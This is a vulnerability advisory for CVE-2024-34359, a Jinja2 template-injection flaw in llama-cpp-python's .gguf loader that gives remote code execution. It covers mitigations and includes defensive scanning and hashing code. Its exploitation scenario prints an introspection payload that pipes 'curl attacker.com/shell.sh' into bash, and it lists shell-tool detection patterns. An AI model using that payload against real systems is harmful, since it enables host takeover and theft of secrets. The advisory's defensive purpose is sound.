CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE
CRITICAL · PoC available · CISA SSVC decision: Attend. Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded, whether via a shared model repo, supply-chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Risk Assessment
Critical exposure for all llama-cpp-python deployments. A CVSS score of 9.6 with a network vector and low attack complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts: loading new models is routine workflow for developers, MLOps engineers, and researchers, so in practice it is almost no barrier. The scope change (S:C) combined with high confidentiality, integrity, and availability impact (C:H/I:H/A:H) means full host takeover, not just model compromise. The vulnerability was not in CISA's KEV catalog at time of publication, but model-as-attack-vector is a maturing supply-chain threat with a high probability of real-world abuse.
Recommended Action
1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a), which introduces a sandboxed Jinja2 environment for chat-template parsing.
2. Source control: only load .gguf files from verified, internally mirrored model registries; treat external model files as untrusted binaries.
3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
4. Detection: monitor for unexpected child processes spawned from Python inference workers (bash, sh, curl, wget launched by llama-cpp-python).
5. Audit: inventory all .gguf files in use and verify their provenance and SHA-256 digests against the source registry.
6. Pipeline gate: add metadata inspection to CI/CD pipelines that scans .gguf chat_template fields for Jinja2 injection patterns before loading.
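The pipeline gate in step 6 can be sketched as a simple pattern check on the chat template string. Extracting that string from a .gguf file's metadata (e.g., with the `gguf` package's reader) is assumed to happen upstream; the pattern list and function name here are illustrative, not a complete detection rule:

```python
# Hypothetical CI gate sketch: flag common Jinja2 SSTI indicators in a
# chat template string pulled from a .gguf file's metadata. A clean
# result is NOT proof of safety -- this only catches known patterns.
import re

SUSPICIOUS = [
    r"__class__", r"__mro__", r"__subclasses__", r"__globals__",
    r"__builtins__", r"__import__", r"\bos\.", r"\bsubprocess\b",
    r"\bpopen\b", r"\beval\b", r"\bexec\b",
]
_PATTERN = re.compile("|".join(SUSPICIOUS), re.IGNORECASE)

def audit_chat_template(template: str) -> list[str]:
    """Return the sorted set of suspicious tokens found in a template."""
    return sorted({m.group(0).lower() for m in _PATTERN.finditer(template)})

# A legitimate chat template only formats messages:
benign = "{% for m in messages %}{{ m.role }}: {{ m.content }}{% endfor %}"
# A payload like the one in this CVE walks Python's object graph:
malicious = "{{ ''.__class__.__mro__[1].__subclasses__() }}"

assert audit_chat_template(benign) == []
print(audit_chat_template(malicious))  # flags __class__, __mro__, __subclasses__
```

A CI job would fail the build whenever `audit_chat_template` returns a non-empty list for any model queued for deployment.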
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-34359?
Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.
Is CVE-2024-34359 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.
How to fix CVE-2024-34359?
1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a), which introduces a sandboxed Jinja2 environment for chat-template parsing.
2. Source control: only load .gguf files from verified, internally mirrored model registries; treat external model files as untrusted binaries.
3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.
4. Detection: monitor for unexpected child processes spawned from Python inference workers (bash, sh, curl, wget launched by llama-cpp-python).
5. Audit: inventory all .gguf files in use and verify their provenance and SHA-256 digests against the source registry.
6. Pipeline gate: add metadata inspection to CI/CD pipelines that scans .gguf chat_template fields for Jinja2 injection patterns before loading.
What systems are affected by CVE-2024-34359?
This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.
What is the CVSS score for CVE-2024-34359?
CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.
Technical Details
NVD Description
llama-cpp-python provides the Python bindings for llama.cpp. It relies on the `Llama` class in `llama.py` to load `.gguf` llama.cpp models. The `__init__` constructor of `Llama` takes several parameters to configure the loading and running of the model. Besides NUMA and LoRA settings, tokenizer loading, and hardware settings, `__init__` also loads the chat template from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the chat template from the metadata with a sandbox-less `jinja2.Environment`, which is then rendered in `__call__` to construct the prompt for each interaction. This allows Jinja2 server-side template injection, which leads to remote code execution via a carefully constructed payload.
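The core flaw, an unsandboxed `jinja2.Environment` rendering an attacker-controlled template, can be illustrated in isolation. This is a minimal sketch rather than llama-cpp-python's actual code; the patched versions switch to Jinja2's sandboxed environment, which rejects the same introspection chain:

```python
# Minimal illustration of why a sandbox-less jinja2.Environment is
# dangerous for attacker-controlled chat templates, and how a sandboxed
# environment (as used by the fix) behaves differently.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# A benign-looking probe of the introspection chain an SSTI payload uses.
probe = "{{ ''.__class__.__mro__[1].__subclasses__() | length }}"

# Unsandboxed: dunder attribute access is allowed, so the template can
# walk from str up to object and enumerate every loaded subclass -- the
# first step toward reaching a process-spawning class like subprocess.Popen.
unsafe = Environment().from_string(probe).render()
print("unsandboxed render succeeded:", unsafe)

# Sandboxed: underscore-prefixed attributes are rejected, so the same
# template raises SecurityError instead of rendering.
try:
    ImmutableSandboxedEnvironment().from_string(probe).render()
except SecurityError as exc:
    print("sandboxed render blocked:", exc)
```

The sandboxed render fails at the `__class__` lookup, before any subclass enumeration can happen, which is exactly the property the patch relies on.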
Exploitation Scenario
An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[1].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via search or a dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation, before any prompts are sent, the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
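One concrete defense against this scenario is the audit step from the recommendations: verify a .gguf file's SHA-256 digest against a trusted internal manifest before it is ever passed to `Llama()`. A minimal sketch, in which the manifest format and function names are illustrative:

```python
# Sketch of a provenance gate: refuse to load any .gguf file whose
# SHA-256 digest is not listed in an internal, trusted manifest.
import hashlib
from pathlib import Path

def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so large model files fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_model(path: Path, trusted: dict[str, str]) -> bool:
    """Allow only models whose digest matches the registry entry."""
    expected = trusted.get(path.name)
    return expected is not None and sha256_of(path) == expected
```

Wiring this check in front of every `Llama(...)` call turns an unsolicited model swap in the registry or on disk into a hard load failure instead of silent code execution.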
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
References
Timeline
Related Vulnerabilities
CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection (same attack type: Supply Chain)
CVE-2024-2912 (10.0) BentoML: RCE via insecure deserialization (same attack type: Supply Chain)
CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read (same attack type: Supply Chain)
CVE-2025-5120 (10.0) smolagents: sandbox escape enables unauthenticated RCE (same attack type: Supply Chain)
CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation (same attack type: Code Execution)